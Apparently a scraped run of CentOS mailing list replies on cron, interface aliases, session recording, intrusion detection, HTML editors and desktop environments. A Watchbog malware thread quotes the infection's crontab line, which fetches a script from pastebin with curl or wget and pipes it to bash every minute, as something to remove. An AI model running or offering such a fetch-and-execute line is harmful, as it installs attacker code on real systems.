Well, this is anything but elegant, but if your daily occurs at an exact hour and minute you could write two series of per minute cron jobs (a "before' and an "after") avoiding that minute. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Leon Fauster via CentOS Sent: Tuesday, February 12, 2019 6:57 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] dont run cron.d- when cron.daily-scripts are running EL6 context: cronie-1.4.4-16.el6_8.2.x86_64 cronie-anacron-1.4.4-16.el6_8.2.x86_64 crontabs-1.10-33.el6.noarch I have some cron.d entries that execute scripts in minute intervals and I'm wondering how could an "official" way look like, to have a condition to not run cron.d entries when cron.daily scripts are running. Sure, I can hack something around file timestamps or so but that feels not so streamlined ... I'd really appreciate any ideas ... -- LF ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] netmask on aliases overriden by netmask on interface
Just a cautionary note, if you use snmpd you may start seeing regular "ia_addr insert" errors using this approach depending on your version of snmpd and how reporting is configured. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Ulf Volmer Sent: Friday, February 8, 2019 11:48 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] netmask on aliases overriden by netmask on interface On 08.02.19 15:08, James B. Byrne via CentOS wrote: > # ifconfig eth1:192008001 > eth1:192008001 Link encap:Ethernet HWaddr 00:25:90:61:74:C1 > inet addr:192.168.8.1 Bcast:192.168.8.255 > Mask:255.255.255.128 > UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 > Interrupt:17 Memory:feae-feb0 > > Which shows that the network mask is determined by the interface mask > and is not overridden by the alias definition. > > Is this expected behaviour? Does this mean that a particular physical > interface cannot belong to more than one network, or at least not to > networks having differing cidr masks? Interface aliases are evil from my point of view. I recommend to configure the ip directly to the interface. #ifcfg-eth2 [...] IPADDR=192.168.200.1 NETMASK=255.255.255.0 IPADDR2=192.168.201.1 NETMASK2=255.255.255.192 ip addr show dev eth2 4: eth2: mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 08:00:27:b0:c5:7c brd ff:ff:ff:ff:ff:ff inet 192.168.200.1/24 brd 192.168.200.255 scope global eth2 inet 192.168.201.1/26 brd 192.168.201.63 scope global eth2 inet6 fe80::a00:27ff:feb0:c57c/64 scope link valid_lft forever preferred_lft forever Best regards Ulf ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] thunderbird & firefox
Anybody used Trinity? I'm seriously thinking about abandoning KDE. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of mark Sent: Friday, January 4, 2019 5:32 PM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] thunderbird & firefox Alice Wonder wrote: > On 1/4/19 8:28 AM, mark wrote: > >> I *really* dislike the new photon UI. I WANT the arrow buttons top and >> bottom of the scrollbars. >> >> Does anyone know how to bring them back, or is that "that's *sooo* last >> year, you can't ever have them again"? >> > Switch to Mate and they are there. I used to like IceWM... but I'm at work and people run either kde or gnome, so I've got to support them. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] recording session
Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. -Original Message- From: CentOS On Behalf Of Ilyass Kaouam Sent: Thursday, December 27, 2018 9:45 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] recording session Hi, Please if you know any opensource tools he can recording session ? Freeipa can do this ? Thank's -- *Ilyass kaouam* *Ingénieur System OpenSource* *Mastère européen Manager de Projets Informatiques* ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos You need to be more specific, what kind of session are you wanting to record and what do you want recorded about that session. Sudo logging has the ability to record everything (including timing) about a sudo session. The script utility can record all or a part of a terminal session. Be aware that escape sequences are recorded as well making re-use (particularly with script) challenging. If you need something different then reply defining that need much more specifically, do you need just session start and end times, keystroke logging, what? ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] CentOS 7.5 Linux box got infected with Watchbog malware
(Apologies in advance: "To top/middle/bottom post, that is the question") In regard to "Search for "linux intrusion detection tools".", I have used Aide (Advanced Intrusion Detection System) and OSSEC, I'm aware of Samhain as well. If anyone has experience with Samhain I would love to hear about it. These systems have their advantages and disadvantages: Aide - Pro: very granular, reasonably easy to use, no library dependencies. Motivated by tripwire but actively maintained (which the free tripwire isn't to the best of my knowledge). Cons: not a daemon, if "it" can be done and totally undone between scans then it's transparent to Aide. Another con, somehow the executable, its database and configuration have to be protected against attack but everything is locally installed - a real challenge. OSSEC - Pro: a daemon, also monitors logs. Cons: Even though it's a daemon, checks are scheduled - same issue as above. Another con: False positives, particularly if "new file detection" is used. And, like Aide, the agent and configuration are locally installed. Issues for all: Learning curve: After installing Aide the first thing I learned was how much change the operating system was making as a part of normal operations. In some ways a good education but it leads to the next dilemma. What do you monitor? If you monitor changing files you may be inundated with alerts. If you don't monitor then how do you protect yourself? Beyond /etc/shadow and database files there are more exotic (and thus more difficult to analyze) situations. As an example, we were using both OSSEC and Aide on a system and, on occasion, Aide would alert that /etc/hosts.deny had an updated modification timestamp but no change in the file. Using auditd (which has its own limitations) I finally discovered that OSSEC was updating hosts.deny with IP addresses of systems it detected were trying to do malicious things but then removing the entry 10 minutes later - a "hamper the attack" technique. In another case icinga (the server side) was creating temporary files as a part of its monitoring. However, they were being created and removed so fast that OSSEC detected the creation but the file was gone on its almost immediate next check causing it to report a possible rootkit (file exists but OS t ools don't find it). Fortunately I was able to capture a similar file and examine its contents. The resource dilemma: Continuous monitoring can be resource intensive, can you accept that? If not, how frequent a monitoring is enough. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. -Original Message- From: CentOS On Behalf Of Pete Biggs Sent: Monday, December 17, 2018 3:58 PM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] CentOS 7.5 Linux box got infected with Watchbog malware > Is there a way to find out how the CentOS 7.5 Linux box got infected > with malware? > Currently i am referring to > http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw > areransomware.html to carry out the below steps and is done manually. > > 1)rm -fr /tmp/*timesyncc.service* > 2)crontab -e -u apigee > delete the cron entry > */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- > https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1 3)ps aux | > grep watchbog kill -9 pidof watchbog > > Any suggestions or recommendations to find out how CentOS 7.5 Linux > box got infected with Watchbog Malware. Well, if the infected crontab is owned by user 'apigee' then it would suggest that whatever runs as that user is the source of the infection. The malware appears to try to elevate its privs, and if it's successful it modifies various system files. What you are seeing in the 'apigee' crontab is just the tip of the iceberg. It is unlikely that what is in that blog will successfully get rid of all the malware - it will probably stop it running, but your system will still have the malware on it and it may have left other backdoors into your system. The *ONL
[CentOS] Running a command at startup
Does your version of CentOS have the @reboot crontab option? If it does this is probably easier unless you want to learn how to write systemd files. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Robert Moskowitz Sent: Wednesday, December 12, 2018 6:04 PM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] Running a command at startup On a support forum, I was told that to turn off my board's blue led run: echo none | sudo tee /sys/class/leds/blue\:heartbeat/trigger Well, this does not survive a system reboot. So I was told: Add the off bit to /etc/rc.local Add it above "exit 0" So of course, CentOS is past using rc.local and recommends: # It is highly advisable to create own systemd services or udev rules # to run scripts during boot instead of using this fi So can someone point me to how to make this into a simple systemd service? thanks ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] CentOS 7.6 external USB dmesg issue
Do you have any "history" with the adapter you connected them to? If not consider it as a possibility as well (from bad experience of total filesystem/partition corruption on two hard drives only to discover it was something on the motherboard). Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Jerry Geis Sent: Wednesday, December 12, 2018 7:49 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] CentOS 7.6 external USB dmesg issue I have a brand new 2T external Samsung SSD disk. (two of them) for backup. I tried the first one and had an issue, I tried the second one and got the same issue. Am I doing something wrong ? I find it hard to believe the SSD (both) are bad. I plugged in the USB 3.1 adapter, I fdisk /dev/sdd, n, p, default, default, w. then mkfs.ext4 -j /dev/sdd1, then just mount and rsync. [ 1085.193710] [] ? account_entity_dequeue+0xae/0xd0 [ 1085.193715] [] schedule+0x29/0x70 [ 1085.193719] [] schedule_timeout+0x221/0x2d0 [ 1085.193724] [] ? __switch_to+0x151/0x580 [ 1085.193730] [] ? ktime_get_ts64+0x52/0xf0 [ 1085.193735] [] io_schedule_timeout+0xad/0x130 [ 1085.193740] [] ? prepare_to_wait_exclusive+0x56/0x90 [ 1085.193744] [] io_schedule+0x18/0x20 [ 1085.193750] [] get_request+0x243/0x7d0 [ 1085.193756] [] ? __radix_tree_create+0x11/0x360 [ 1085.193761] [] ? wake_up_atomic_t+0x30/0x30 [ 1085.193767] [] blk_queue_bio+0xfe/0x400 [ 1085.193772] [] generic_make_request+0x147/0x380 [ 1085.193778] [] submit_bio+0x70/0x150 [ 1085.193786] [] ? bio_alloc_bioset+0x115/0x310 [ 1085.193791] [] _submit_bh+0x127/0x160 [ 1085.193797] [] submit_bh+0x10/0x20 [ 1085.193808] [] ext4_read_block_bitmap_nowait+0x4c4/0x640 [ext4] [ 1085.193828] [] ext4_mb_init_cache+0x181/0x6e0 [ext4] [ 1085.193834] [] ? lru_cache_add+0xe/0x10 [ 1085.193840] [] ? find_or_create_page+0x5e/0xa0 [ 1085.193858] [] ext4_mb_init_group+0x126/0x230 [ext4] [ 1085.193874] [] ext4_mb_good_group+0x184/0x1a0 [ext4] [ 1085.193889] [] ext4_mb_regular_allocator+0x1c5/0x470 [ext4] [ 1085.193906] [] ? __ext4_journal_stop+0x3c/0xb0 [ext4] [ 1085.193921] [] ? ext4_mb_normalize_request+0x20c/0x560 [ext4] [ 1085.193936] [] ext4_mb_new_blocks+0x65b/0xa20 [ext4] [ 1085.193942] [] ? __getblk+0x2d/0x300 [ 1085.193961] [] ext4_ind_map_blocks+0xb9b/0xc20 [ext4] [ 1085.193968] [] ? hrtimer_cancel+0x28/0x40 [ 1085.193973] [] ? zone_statistics+0x88/0xa0 [ 1085.193987] [] ext4_map_blocks+0x295/0x6e0 [ext4] [ 1085.193993] [] ? do_select+0x73e/0x7c0 [ 1085.193999] [] ? kmem_cache_alloc+0x1c2/0x1f0 [ 1085.194006] [] ? alloc_buffer_head+0x21/0x60 [ 1085.194018] [] _ext4_get_block+0x1df/0x220 [ext4] [ 1085.194030] [] ext4_get_block+0x16/0x20 [ext4] [ 1085.194036] [] __block_write_begin_int+0x198/0x5f0 [ 1085.194041] [] ? kmem_cache_alloc+0x1c2/0x1f0 [ 1085.194053] [] ? _ext4_get_block+0x220/0x220 [ext4] [ 1085.194067] [] ? ext4_write_begin+0x116/0x440 [ext4] [ 1085.194073] [] __block_write_begin+0x11/0x20 [ 1085.194085] [] ext4_write_begin+0x18f/0x440 [ext4] [ 1085.194091] [] generic_file_buffered_write+0x124/0x2c0 [ 1085.194098] [] __generic_file_aio_write+0x1e2/0x400 [ 1085.194105] [] generic_file_aio_write+0x59/0xa0 [ 1085.194116] [] ext4_file_write+0xd2/0x1e0 [ext4] [ 1085.194121] [] do_sync_write+0x93/0xe0 [ 1085.194127] [] vfs_write+0xc0/0x1f0 [ 1085.194132] [] SyS_write+0x7f/0xf0 [ 1085.194138] [] system_call_fastpath+0x22/0x27 Thanks, Jerry ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] Tools/mechanisms for the management of access permissions in big filebased datasets
Well, there are extended ACLs if they're available in CentOS, when I first worked with them (long ago) they were new (and on a different Distro). I hope support for them has improved. They allow multiple users/groups to be assigned permissions to a file/directory. The problem then was that chmod (and other programs) were not extended-ACL-aware and could over-ride extended ACLs. There was a mechanism to recover from the situation but what it basically came down to was eternal vigilance - the system administrators had to understand (and agree about) extended ACLs and be careful/diligent in applying them. There are hacks which could possibly help (rename chmod and replace it with a script warning about extended ACLs) but, in the final analysis, it's not a decision to be undertaken lightly (unless the situation has changed dramatically). Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Frank Thommen Sent: Tuesday, November 27, 2018 7:25 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] Tools/mechanisms for the management of access permissions in big filebased datasets Hello, we are currently managing access permissions through classical user-group-others permissions on a multi-petabyte directory tree with partially very deep and broad directories. Projects are represented by directory trees and mapped through GIDs. Lately we had lots of "singular" permission request (one single user needs access to a single dataset but should not be able to see all other datasets belonging to the same project). We realized, that the UGO model doesn't scale and is becoming more and more unmanageable. Can you recommend tools/mechanisms/technologies to overcome the drawbacks of the UGO model? We are thinking about some purely ACL based mechanism (but are open to other ideas). All filesystems in question are mounted via NFSv4 and the clients are (almost) completely CentOS 7.x hsots. Ideally the tool would have some web UI and some kind of (REST)API which allows us to modify permissions from our inhouse data management application (which does /not/ manage permissions, just the structure of the data). Additionally it should be able to visualize/report permissions in directory. I wasn't very successful in googling possible candidates, hence the question to the list. Cheers frank ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] CentOS 7 bash perhaps off topic
If I'm understanding you corectly, you want smwebsocket to continuously pull data passing it to grep for filtering and ultimately to myprogram to update a database. If that's correct I haven't had an opportunity to work with that but my current understanding of how pipelining works is that smwebsocket would retrieve $URL (which would be a finite amount of data), it would end sending output to grep which would filter it (and end) sending its output to the while loop around myprogram which would process it until there was no more data (and end) thus landing at 'sleep 60' only to start over again. If a pipeline is capable of continuous processing I'm not aware of it (but would be glad to know that's how it can work). Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Jerry Geis Sent: Monday, November 26, 2018 2:11 PM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] CentOS 7 bash perhaps off topic hi all, I have a small script that seems to be exiting and hitting the sleep 60... The smwebsocket just connects to the web socket provided and outputs the data. This works manually. the myprogram just opens a database and writes the line... My desire is to run the smwebsocket, connect to the websocket and output the data (line by line) when we get a line that matches Location take that line and output to the database. Seems simple. I desire this to keep the connection alive and just continue to read data and grep on the data etc... if smwebsocket does exit, sleep 60 and reconnect. However it seems to be exiting and running the sleep 60. Am I missing something ? while [ 1 ] do smwebsocket "$URL" | grep Location | while read line do myprogram -data "$line" done sleep 60 Reconnecting... done All the pieces work - just not the actual running. What am I missing? Jerry ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Upping my game on web work
Given your situation I would consider carefully crafting the html yourself (frames for content, etc) and specifying constraints for them (for example: not changing an image's size and saving any file for use without line feeds) such that file replacement was all that is needed. For someone who isn't technically trained (your end user apparently), turning them loose with any HTML editor is equivalent to handing a scalpel to a child. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Robert Moskowitz Sent: Wednesday, November 21, 2018 10:07 AM To: CentOS mailing list; mark Subject: [EXTERNAL] Re: [CentOS] Upping my game on web work On 11/21/18 10:26 AM, mark wrote: > Frank Cox wrote: >> On Wed, 21 Nov 2018 09:02:38 -0500 >> Robert Moskowitz wrote: >> >>> What 'simple' web support tools do we have here? >> Libreoffice can create a html page from a word processor document. >> >> I've done that a few times where I do the basic layout with libreoffice >> and then hand-edit the html to fine tune it. But my web pages aren't >> usually anything exceptionally fancy. >> > No word processor produces anything but absolute 100% pure crap HTML. > Every single line has every possible option, and a few extras. > > The one HTML editor I ever tried, Quanta, had the lovely habit of, once > you hit ?display", when you went back to editing, it has left justified > *every* *line*. > > I hate to suggest it, but something like WordPress might be what you want, > if that's not overkill. > >mark "my web pages proudly built in vi" I can make the basic pages, but they need to tools to upload content. Recordings, announcements (in pdf) and the like. So something more than here is how to compose your html and here is SSH to do a scp file transfer I will look at docuwiki and perhaps WordPress (seem to recall it is more than just an html editor). ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Upping my game on web work
There are several options, Mozilla had/has SeaMonkey, w3c has Amaya, there's Bluefish and Kompozer, search the web for 'html web editor linux' - you'll find more than enough options. I've used Amaya and Kompozer, they're adequate but you still need to be able to write your own html. I've used OpenOffice and it produces pretty bloated results, seems everyone is interested in creating sophisticated, complex html rather than just getting the job done. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Robert Moskowitz Sent: Wednesday, November 21, 2018 8:23 AM To: CentOS mailing list; Frank Cox Subject: [EXTERNAL] Re: [CentOS] Upping my game on web work On 11/21/18 9:16 AM, Frank Cox wrote: > On Wed, 21 Nov 2018 09:02:38 -0500 > Robert Moskowitz wrote: > >> What 'simple' web support tools do we have here? > Libreoffice can create a html page from a word processor document. > > I've done that a few times where I do the basic layout with libreoffice and > then hand-edit the html to fine tune it. But my web pages aren't usually > anything exceptionally fancy. That might be interesting to try. The one time I tried using Word to create html was a disaster so much crude stuffed into the html and for what? For years I use an xml editor (geany now adays) and code what I want. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 2024
Interesting, I'm going to have to try something based on your comment, although I've been through a few distro releases /home has remained the same. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of mark Sent: Friday, November 2, 2018 3:19 PM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 2024 Leroy Tennison wrote: > I use KDE and they need to, quality is lacking, every time I boot up I > get to discover where my icons will be located (and this has been going > on through at least a couple of recvisions). Locking doesn't help, even > making the file I thought contained the positions immutable didn't help. > I'm going to have to look at Trinity. > Odd, I've never had that problem. On the other hand, I *really* dislike gnome. I think their target is 16 yr olds. mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 2024
I use KDE and they need to, quality is lacking, every time I boot up I get to discover where my icons will be located (and this has been going on through at least a couple of recvisions). Locking doesn't help, even making the file I thought contained the positions immutable didn't help. I'm going to have to look at Trinity. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Frank Cox Sent: Friday, November 2, 2018 3:02 PM To: centos@centos.org Subject: [EXTERNAL] [CentOS] Red Hat is Planning To Deprecate KDE on RHEL By 2024 https://www.theregister.co.uk/2018/11/02/rhel_deprecates_kde/ That's still several years in the future, of course. I use Mate on all of my machines rather than Gnome or KDE and I'm sure many of you fine folks do the same. But it's interesting nonetheless. -- MELVILLE THEATRE ~ Real D 3D Digital Cinema ~ www.melvilletheatre.com ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Would RHEL, CentOS, and Fedora Remain Open Source/Free Software After IBM Buys Red Hat for $34 Billion?
If I heard/remember correctly, AT's UNIX was proprietary but they released it to academic institutions under NDA and were lax in enforcement. We all know what happened. In this case it's obviously open source, we know what will happen if someone tries something. My main concern is future development, will it remain open source. My real fear is that a certain un-named company is going to feel pressured to buy Canonical. My surprise is that no one is commenting on the price IMB is offering, a 60-70% premium, that in and of itself seems risky. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Japheth Cleaver Sent: Tuesday, October 30, 2018 11:15 PM To: CentOS mailing list; Turritopsis Dohrnii Teo En Ming Subject: [EXTERNAL] Re: [CentOS] Would RHEL, CentOS, and Fedora Remain Open Source/Free Software After IBM Buys Red Hat for $34 Billion? On 10/30/2018 9:12 PM, Turritopsis Dohrnii Teo En Ming wrote: > Why do you say so? > > On 10/31/18 12:44 AM, Turritopsis Dohrnii Teo En Ming wrote: >> Good morning from Singapore, >> >> This is of paramount importance. Would Red Hat Enterprise Linux (RHEL), >> CentOS, and Fedora remain open source/free software after IBM buys Red Hat >> for $34 Billion? > yes, because closing the code is the same as burning $34 Billion. Think of it this way: A company specializing in 10 year support for an operating environment is being bought by a company specializing in 25-30 year support for an operating environment. Enterprise Linux -- and thus any derivative, like CentOS -- is not going away any time soon. Fedora's value is far more in the technology aggregation (IMO) than support. IBM isn't and thus I don't think the project is any danger, but Fedora would be workably forkable if it really came down to it. -jc ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] What are the differences between systemd and non-systemd Linux distros?
This is indeed good news (that BSD isn't necessarily going to adopt systemd). Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com TThis message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Mark Rousell Sent: Wednesday, October 17, 2018 11:03 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] What are the differences between systemd and non-systemd Linux distros? On 17/10/2018 10:11, Anthony K wrote: > It's starting to look as though the BSD camp may embrace systemd > sooner rather than later: > > https://youtu.be/6AeWu1fZ7bY?t=1537 - I like this bit the most in that > video! > > But do watch the entire presentation - good stuff. I've listened to the video and no, it doesn't say any such thing. The video does not say that BSD is going to use systemd. What the speaker in the video certainly does point out is that service and system management is a good thing overall and that there are better ways of doing this than SysVinit. However, most people have not disputed this. A lot of people, including very many of those who greatly dislike systemd, accept that SysVinit could and should be replaced or improved upon. It's just that they do not think, for a variety of entirely legitimate reasons, that systemd is the right software to do this. Even on Devuan, for example, many people prefer to use init software other than SysVinit. The speaker says, amongst others thing, "what I find amusing occasionally is that a lot of people who bitch about systemd, don't bitch about launchd but I find that funny because systemd is launchd in concept" but he should not be surprised. The people who complain 